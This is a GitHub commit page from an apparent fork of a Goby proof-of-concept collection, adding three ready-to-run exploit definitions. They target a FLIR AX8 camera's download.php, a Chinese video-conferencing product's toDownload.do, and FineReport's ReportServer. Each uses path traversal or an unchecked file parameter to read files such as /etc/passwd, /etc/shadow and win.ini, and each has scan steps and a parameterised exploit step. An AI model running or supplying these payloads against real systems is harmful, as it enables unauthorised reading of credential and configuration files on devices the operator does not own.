forked from MY0723/goby-poc
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
100 changed files
with
9,549 additions
and
0 deletions.
There are no files selected for viewing
146 changes: 146 additions & 0 deletions
146
FLIR_AX8_Arbitrary_File_Download_Vulnerability_CNVD-2021-39018.go
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,146 @@ | ||
| package exploits | ||
|
|
||
| import ( | ||
| "git.gobies.org/goby/goscanner/goutils" | ||
| ) | ||
|
|
||
| func init() { | ||
| expJson := `{ | ||
| "Name": "FLIR-AX8 Arbitrary File Download Vulnerability", | ||
| "Description": "Teledyne FLIR specializes in the design, development, manufacture, marketing and marketing of specialized technologies for enhanced situational awareness.\\nFLIR-AX8 has an arbitrary file download vulnerability.An attacker can use the vulnerability to download relevant system configuration files.", | ||
| "Product": "FLIR AX8 71213294,FLIR AX8 71219303", | ||
| "Homepage": "https://www.flir.cn", | ||
| "DisclosureDate": "2021-07-06", | ||
| "Author": "[email protected]", | ||
| "GobyQuery": "header=\"lighttpd\"", | ||
| "Level": "2", | ||
| "Impact": "<p><span style=\"font-size: 14px;\">Arbitrary file download or read vulnerability is mainly because when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter and does not verify the legitimacy of the file path, resulting in the attacker can jump through the directory (..</span><span style=\"font-size: 14px;\">\\ or..</span><span style=\"font-size: 14px;\">/) way to download or read a file outside the original specified path.</span><span style=\"font-size: 14px;\">The attacker can finally download or read any file on the system through the vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in the sensitive information leakage of the system</span><br></p>", | ||
| "Recommandation": "<p style=\"text-align: justify;\">The manufacturer has not provided the vulnerability fix solution, please pay attention to the manufacturer's home page to update:<span style=\"color: var(--primaryFont-color);\"><a href=\"https://www.flir.cn/\">https://www.flir.cn/</a></span></p>", | ||
| "References": [ | ||
| "https://www.pwnwiki.org/index.php?title=%E8%8F%B2%E5%8A%9B%E7%88%BE_FLIR-AX8_download.php_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BC%89%E6%BC%8F%E6%B4%9E" | ||
| ], | ||
| "HasExp": true, | ||
| "ExpParams": [ | ||
| { | ||
| "name": "file", | ||
| "type": "createSelect", | ||
| "value": "/etc/passwd,/etc/shadow,/etc/hosts", | ||
| "show": "" | ||
| } | ||
| ], | ||
| "ExpTips": { | ||
| "Type": "", | ||
| "Content": "" | ||
| }, | ||
| "ScanSteps": [ | ||
| "OR", | ||
| { | ||
| "Request": { | ||
| "method": "GET", | ||
| "uri": "/download.php?file=/etc/group", | ||
| "follow_redirect": true, | ||
| "header": {}, | ||
| "data_type": "text", | ||
| "data": "" | ||
| }, | ||
| "ResponseTest": { | ||
| "type": "group", | ||
| "operation": "AND", | ||
| "checks": [ | ||
| { | ||
| "type": "item", | ||
| "variable": "$body", | ||
| "operation": "contains", | ||
| "value": "root", | ||
| "bz": "" | ||
| } | ||
| ] | ||
| }, | ||
| "SetVariable": [] | ||
| }, | ||
| { | ||
| "Request": { | ||
| "method": "GET", | ||
| "uri": "/download.php?file=/etc/passwd", | ||
| "follow_redirect": true, | ||
| "header": {}, | ||
| "data_type": "text", | ||
| "data": "" | ||
| }, | ||
| "ResponseTest": { | ||
| "type": "group", | ||
| "operation": "AND", | ||
| "checks": [ | ||
| { | ||
| "type": "item", | ||
| "variable": "$body", | ||
| "operation": "contains", | ||
| "value": "root", | ||
| "bz": "" | ||
| } | ||
| ] | ||
| }, | ||
| "SetVariable": [] | ||
| }, | ||
| { | ||
| "Request": { | ||
| "method": "GET", | ||
| "uri": "/download.php?file=/etc/shadow", | ||
| "follow_redirect": true, | ||
| "header": {}, | ||
| "data_type": "text", | ||
| "data": "" | ||
| }, | ||
| "ResponseTest": { | ||
| "type": "group", | ||
| "operation": "AND", | ||
| "checks": [ | ||
| { | ||
| "type": "item", | ||
| "variable": "$body", | ||
| "operation": "contains", | ||
| "value": "root", | ||
| "bz": "" | ||
| } | ||
| ] | ||
| }, | ||
| "SetVariable": [] | ||
| } | ||
| ], | ||
| "ExploitSteps": [ | ||
| "AND", | ||
| { | ||
| "Request": { | ||
| "method": "GET", | ||
| "uri": "/download.php?file={{{file}}}", | ||
| "follow_redirect": true, | ||
| "header": {}, | ||
| "data_type": "text", | ||
| "data": "" | ||
| }, | ||
| "SetVariable": [ | ||
| "output|lastbody" | ||
| ] | ||
| } | ||
| ], | ||
| "Tags": [ | ||
| "fileread" | ||
| ], | ||
| "CVEIDs": null, | ||
| "CVSSScore": "0.0", | ||
| "AttackSurfaces": { | ||
| "Application": ["FLIR AX8 71213294,FLIR AX8 71219303"], | ||
| "Support": null, | ||
| "Service": null, | ||
| "System": null, | ||
| "Hardware": null | ||
| } | ||
| }` | ||
|
|
||
| ExpManager.AddExploit(NewExploit( | ||
| goutils.GetFileName(), | ||
| expJson, | ||
| nil, | ||
| nil, | ||
| )) | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,105 @@ | ||
| { | ||
| "Name": "好视通云会议存在任意文件读取漏洞", | ||
| "Level": "2", | ||
| "Tags": [ | ||
| "fileread" | ||
| ], | ||
| "GobyQuery": "body=\"深圳银澎云计算有限公司\"", | ||
| "Description": "好视通云会议存在任意文件读取漏洞", | ||
| "Product": "好视通云会议", | ||
| "Homepage": "https://www.hst.com/", | ||
| "Author": "aetkrad", | ||
| "Impact": "", | ||
| "Recommendation": "", | ||
| "References": [ | ||
| "https://mp.weixin.qq.com/s/fMNE1PF5n81O1BpoDRlYkA" | ||
| ], | ||
| "HasExp": true, | ||
| "ExpParams": [ | ||
| { | ||
| "Name": "Filepath", | ||
| "Type": "input", | ||
| "Value": "../../../../../../../../../../../../../../windows/win.ini" | ||
| } | ||
| ], | ||
| "ExpTips": { | ||
| "Type": "", | ||
| "Content": "" | ||
| }, | ||
| "ScanSteps": [ | ||
| "AND", | ||
| { | ||
| "Request": { | ||
| "method": "GET", | ||
| "uri": "/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini", | ||
| "follow_redirect": false, | ||
| "header": null, | ||
| "data_type": "text", | ||
| "data": "", | ||
| "set_variable": [] | ||
| }, | ||
| "ResponseTest": { | ||
| "type": "group", | ||
| "operation": "AND", | ||
| "checks": [ | ||
| { | ||
| "type": "item", | ||
| "variable": "$code", | ||
| "operation": "==", | ||
| "value": "200", | ||
| "bz": "" | ||
| }, | ||
| { | ||
| "type": "item", | ||
| "variable": "$body", | ||
| "operation": "contains", | ||
| "value": "[fonts]", | ||
| "bz": "" | ||
| }, | ||
| { | ||
| "type": "item", | ||
| "variable": "$body", | ||
| "operation": "contains", | ||
| "value": "[extensions]", | ||
| "bz": "" | ||
| } | ||
| ] | ||
| }, | ||
| "SetVariable": [ | ||
| "output|lastbody|regex|" | ||
| ] | ||
| } | ||
| ], | ||
| "ExploitSteps": [ | ||
| "AND", | ||
| { | ||
| "Request": { | ||
| "method": "GET", | ||
| "uri": "/register/toDownload.do?fileName={{{Filepath}}}", | ||
| "follow_redirect": false, | ||
| "header": null, | ||
| "data_type": "text", | ||
| "data": "", | ||
| "set_variable": [] | ||
| }, | ||
| "ResponseTest": { | ||
| "type": "group", | ||
| "operation": "AND", | ||
| "checks": [ | ||
| { | ||
| "type": "item", | ||
| "variable": "$code", | ||
| "operation": "==", | ||
| "value": "200", | ||
| "bz": "" | ||
| } | ||
| ] | ||
| }, | ||
| "SetVariable": [ | ||
| "output|lastbody||" | ||
| ] | ||
| } | ||
| ], | ||
| "PostTime": "2021-12-11 14:50:39", | ||
| "GobyVersion": "1.9.310" | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,51 @@ | ||
| { | ||
| "Name": "FineReport(帆软)报表系统目录遍历漏洞", | ||
| "Level": "1", | ||
| "Tags": [], | ||
| "GobyQuery": "body=\"/WebReport/ReportServer\"", | ||
| "Description": "漏洞影响\nFineReport v8.0\nFineReport v9.0", | ||
| "Product": "FineReport(帆软)报表系统", | ||
| "Homepage": "https://gobies.org/", | ||
| "Author": "luckying", | ||
| "Impact": "", | ||
| "Recommandation": "<p>undefined</p>", | ||
| "References": [ | ||
| "https://gobies.org/" | ||
| ], | ||
| "ScanSteps": [ | ||
| "AND", | ||
| { | ||
| "Request": { | ||
| "method": "GET", | ||
| "uri": "/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../../../../../../../../../../../../etc¤tUserName=admin¤tUserId=1&isWebReport=true", | ||
| "follow_redirect": false, | ||
| "header": {}, | ||
| "data_type": "text", | ||
| "data": "" | ||
| }, | ||
| "ResponseTest": { | ||
| "type": "group", | ||
| "operation": "AND", | ||
| "checks": [ | ||
| { | ||
| "type": "item", | ||
| "variable": "$code", | ||
| "operation": "==", | ||
| "value": "200", | ||
| "bz": "" | ||
| }, | ||
| { | ||
| "type": "item", | ||
| "variable": "$body", | ||
| "operation": "contains", | ||
| "value": "etc/passwd", | ||
| "bz": "" | ||
| } | ||
| ] | ||
| }, | ||
| "SetVariable": [] | ||
| } | ||
| ], | ||
| "PostTime": "2021-06-12 22:55:02", | ||
| "GobyVersion": "1.8.268" | ||
| } |
Oops, something went wrong.